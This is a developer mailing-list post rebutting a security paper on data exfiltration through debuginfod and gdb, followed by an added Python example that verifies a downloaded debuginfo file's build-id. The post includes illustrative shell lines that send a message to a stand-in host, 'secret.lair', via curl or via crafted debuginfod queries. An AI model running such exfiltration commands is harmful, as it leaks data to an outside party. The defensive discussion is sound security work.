Date: Sun, 29 Oct 2023 14:54:04 -0400
From: "Frank Ch. Eigler"
To: elfutils-devel@sourceware.org
Subject: regarding the "Abusing gdb Features for Data Ingress & Egress" paper

Hi -

A few days ago, I was pointed to a paper [1] from a security researcher
that deals with debuginfod. The first half of the paper is a fine
overview of how the system works.

[1] https://www.archcloudlabs.com/projects/debuginfod/

The second half takes a turn toward security concerns. I'd like to
address a few points there.

"Rogue Server - Sending Arbitrary Data to Clients"

This section appears to be belabouring the point already given in the
debuginfod man page. Yes, indeed, if your chosen debuginfod server is
hypothetically fed bad data or is compromised, you may receive bad data.
The paper does not identify any actual vulnerability or means to
compromise any operating debuginfod servers.

Note that we are in the process of adding a degree of cryptographic
assurance of data provenance [2] to debuginfod. This aims to provide
protection against accidental or deliberate corruption anywhere between
the distribution's build system and the debuginfod client.

[2] https://sourceware.org/bugzilla/show_bug.cgi?id=28204

"Rogue Client - Sending Arbitrary Data to Servers"

This section posits a situation where you wish to exfiltrate data, and
you want to do this by running gdb on binaries with crafted buildids.
That gdb would then communicate those crafted buildids to a debuginfod
server in your control.

This is a fascinating hypothetical, and makes this writer curious about
what manner of system offers this kind of privilege to an attacker:

  % gcc foo.c
  % export DEBUGINFOD_URLS=https://secret.lair/
  % for snippet in $message; do
  %   reverse-engineering-tool a.out $snippet
  %   gdb a.out
  % done

but not something as simple as:

  % curl -F message=$message https://secret.lair/

- FChE
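A check a practitioner would want on the client side for the "Rogue Server" point in the message above, written here as an added example (it is not elfutils code and not part of the message): whatever a debuginfod server returns for /buildid/BUILDID/debuginfo should at least be an ELF file whose NT_GNU_BUILD_ID note equals the build-id that was requested. The script below walks the PT_NOTE segments of a little-endian ELF64 image, extracts that note and compares it, treating malformed or truncated input as a failure rather than trusting it; the sample ELF images it checks are constructed in-script with the hypothetical helper make_elf_with_build_id. A matching build-id rules out a wrong or corrupted file, but not a malicious file that was built with a forged note, which is the gap the provenance work referenced in [2] is meant to close.

```python
"""Verify that a fetched debuginfo file carries the requested GNU build-id.

Added example for the "rogue debuginfod server" discussion; not elfutils code.
Only little-endian ELF64 is handled, and only via PT_NOTE segments (the same
place a loader or gdb would look)."""
import struct

ELF_MAGIC = b"\x7fELF"
PT_NOTE = 4
NT_GNU_BUILD_ID = 3


def _align4(n):
    """ELF note fields are padded to 4-byte boundaries."""
    return (n + 3) & ~3


def gnu_build_id(blob):
    """Return the hex NT_GNU_BUILD_ID of an LE ELF64 image, or None if the
    file has no such note.  Raises ValueError for anything that is not a
    well-formed LE ELF64 file (wrong magic, truncated headers, notes that
    run past their segment)."""
    if len(blob) < 64 or blob[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    if blob[4] != 2 or blob[5] != 1:          # EI_CLASS, EI_DATA
        raise ValueError("only little-endian ELF64 is handled here")
    e_phoff = struct.unpack_from("<Q", blob, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", blob, 54)
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if off + 56 > len(blob):
            raise ValueError("truncated program header table")
        p_type, _flags, p_offset, _va, _pa, p_filesz = struct.unpack_from(
            "<IIQQQQ", blob, off)
        if p_type != PT_NOTE:
            continue
        end = p_offset + p_filesz
        if end > len(blob):
            raise ValueError("PT_NOTE segment extends past end of file")
        pos = p_offset
        while pos + 12 <= end:                 # one Elf64_Nhdr per note
            namesz, descsz, ntype = struct.unpack_from("<III", blob, pos)
            pos += 12
            desc_start = pos + _align4(namesz)
            desc_end = desc_start + descsz
            if desc_end > end:
                raise ValueError("note overruns its segment")
            name = blob[pos:pos + namesz]
            desc = blob[desc_start:desc_end]
            pos = desc_start + _align4(descsz)
            if name == b"GNU\0" and ntype == NT_GNU_BUILD_ID and descsz > 0:
                return desc.hex()
    return None


def verify_debuginfo(requested_buildid, blob):
    """True iff blob parses as an ELF whose GNU build-id equals the hex
    build-id that was requested from the server (case-insensitive).
    Any parse failure counts as a mismatch: bad data is never accepted."""
    try:
        found = gnu_build_id(blob)
    except ValueError:
        return False
    return found is not None and found == requested_buildid.lower()


def make_elf_with_build_id(build_id):
    """Constructed sample input (hypothetical helper): a minimal LE ELF64
    image whose only segment is a PT_NOTE carrying NT_GNU_BUILD_ID =
    build_id (bytes).  It is not loadable; it exists only to exercise the
    parser offline."""
    name = b"GNU\0"
    note = struct.pack("<III", len(name), len(build_id), NT_GNU_BUILD_ID)
    note += name.ljust(_align4(len(name)), b"\0")
    note += build_id.ljust(_align4(len(build_id)), b"\0")
    phoff, phentsize, phnum = 64, 56, 1
    note_off = phoff + phentsize * phnum
    ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\0" * 8   # ELF64, LE, v1
    ehdr = struct.pack("<16sHHIQQQIHHHHHH", ident,
                       3, 62, 1, 0, phoff, 0, 0,          # ET_DYN, x86-64
                       64, phentsize, phnum, 0, 0, 0)
    phdr = struct.pack("<IIQQQQQQ", PT_NOTE, 4, note_off, 0, 0,
                       len(note), len(note), 4)
    return ehdr + phdr + note


if __name__ == "__main__":
    requested = bytes(range(20)).hex()        # what the client asked for
    honest = make_elf_with_build_id(bytes(range(20)))
    swapped = make_elf_with_build_id(bytes(20))   # rogue server: wrong file
    print("honest reply accepted:", verify_debuginfo(requested, honest))
    print("swapped reply accepted:", verify_debuginfo(requested, swapped))
    print("garbage reply accepted:", verify_debuginfo(requested, b"<html>"))
```

In practice the blob would be the file a client just downloaded for a given build-id; a False result is a reason to discard the file and log the server, not to fall back to using it anyway.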